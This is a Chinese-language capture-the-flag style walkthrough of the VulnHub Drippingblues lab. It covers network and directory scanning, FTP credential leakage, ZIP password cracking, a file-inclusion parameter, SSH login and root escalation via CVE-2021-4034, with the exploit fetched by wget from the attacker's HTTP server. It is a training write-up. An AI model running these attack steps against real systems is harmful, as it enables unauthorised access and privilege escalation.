渗透学习第四天之drippingblues靶机复现
字数 1345 2025-08-19 12:42:24
Drippingblues靶机渗透测试详细教学文档
0x00 实验环境准备
- 攻击机: Kali Linux (IP: 192.168.80.128)
- 靶机: Drippingblues (初始IP未知)
- 靶机下载地址: https://download.vulnhub.com/drippingblues/drippingblues.ova
0x01 信息收集阶段
1. 网络扫描
由于靶机IP未知,首先进行网段扫描:
nmap -sn 192.168.80.0/24
发现靶机IP为 192.168.80.130
2. 端口扫描
对靶机进行详细端口扫描:
nmap -sV -p- 192.168.80.130
扫描结果应显示:
- 21/tcp: FTP服务
- 22/tcp: SSH服务
- 80/tcp: HTTP服务
3. 目录扫描
使用工具如dirb或gobuster进行web目录扫描:
gobuster dir -u http://192.168.80.130 -w /usr/share/wordlists/dirb/common.txt
发现以下关键路径:
- /dripisreal.txt
- /etc/dripispowerful.html
- /robots.txt
0x02 渗透测试过程
1. Web应用分析
访问发现:
/dripisreal.txt: 包含长文本内容,可能是SSH密码提示/etc/dripispowerful.html: 返回404错误/robots.txt: 仅记录上述两个路径
2. FTP服务利用
端口扫描发现FTP服务(21端口)存在信息泄露,获取到FTP凭据:
ftp 192.168.80.130
# 使用泄露的凭据登录
在FTP服务器上发现一个ZIP压缩文件,下载到本地:
get filename.zip
3. ZIP密码破解
使用fcrackzip工具破解ZIP密码:
fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt filename.zip
破解得到密码: 072528035
解压ZIP文件:
unzip -P 072528035 filename.zip
解压后得到:
- 一个txt文件,内容为"just focus on 'drip'"
- 另一个加密的ZIP文件
4. Web应用漏洞利用
重新审视web应用,发现index.php可能存在文件包含漏洞:
尝试参数注入:
http://192.168.80.130/index.php?drip=/etc/dripispowerful.html
查看页面源码,发现隐藏的SSH密码。
5. SSH登录尝试
根据web页面内容,猜测可能的用户名:
- travisscott
- thugger
使用发现的密码尝试SSH登录:
ssh thugger@192.168.80.130
# 输入发现的密码
成功登录thugger账户。
6. 权限提升
6.1 初步信息收集
查看当前用户权限:
sudo -l
发现没有sudo权限。
查找用户目录内容:
ls -la
cat user.txt # 获取用户flag
6.2 查找特权文件
查找具有root权限的文件:
find / -perm -4000 2>/dev/null
发现policykit-1可能存在漏洞。
6.3 漏洞利用
靶机存在以下漏洞:
- CVE-2021-4034
- CVE-2021-3560
检查Python环境:
python3 --version
从GitHub下载CVE-2021-4034的Python exploit,传输到靶机:
# 在攻击机
python3 -m http.server 8000
# 在靶机
wget http://192.168.80.128:8000/exploit.py
执行exploit:
python3 exploit.py
成功获取root权限。
7. 获取root flag
cd /root
cat root.txt
0x03 技术要点总结
- 信息收集:全面的端口扫描和目录扫描是渗透测试的基础
- 凭证破解:使用fcrackzip等工具进行密码破解
- 文件包含漏洞:通过参数注入访问受限文件
- 权限提升:
- 识别具有root权限的可执行文件
- 利用已知CVE漏洞(Polkit提权漏洞)
- 环境适配:当gcc不可用时,选择Python版本的exploit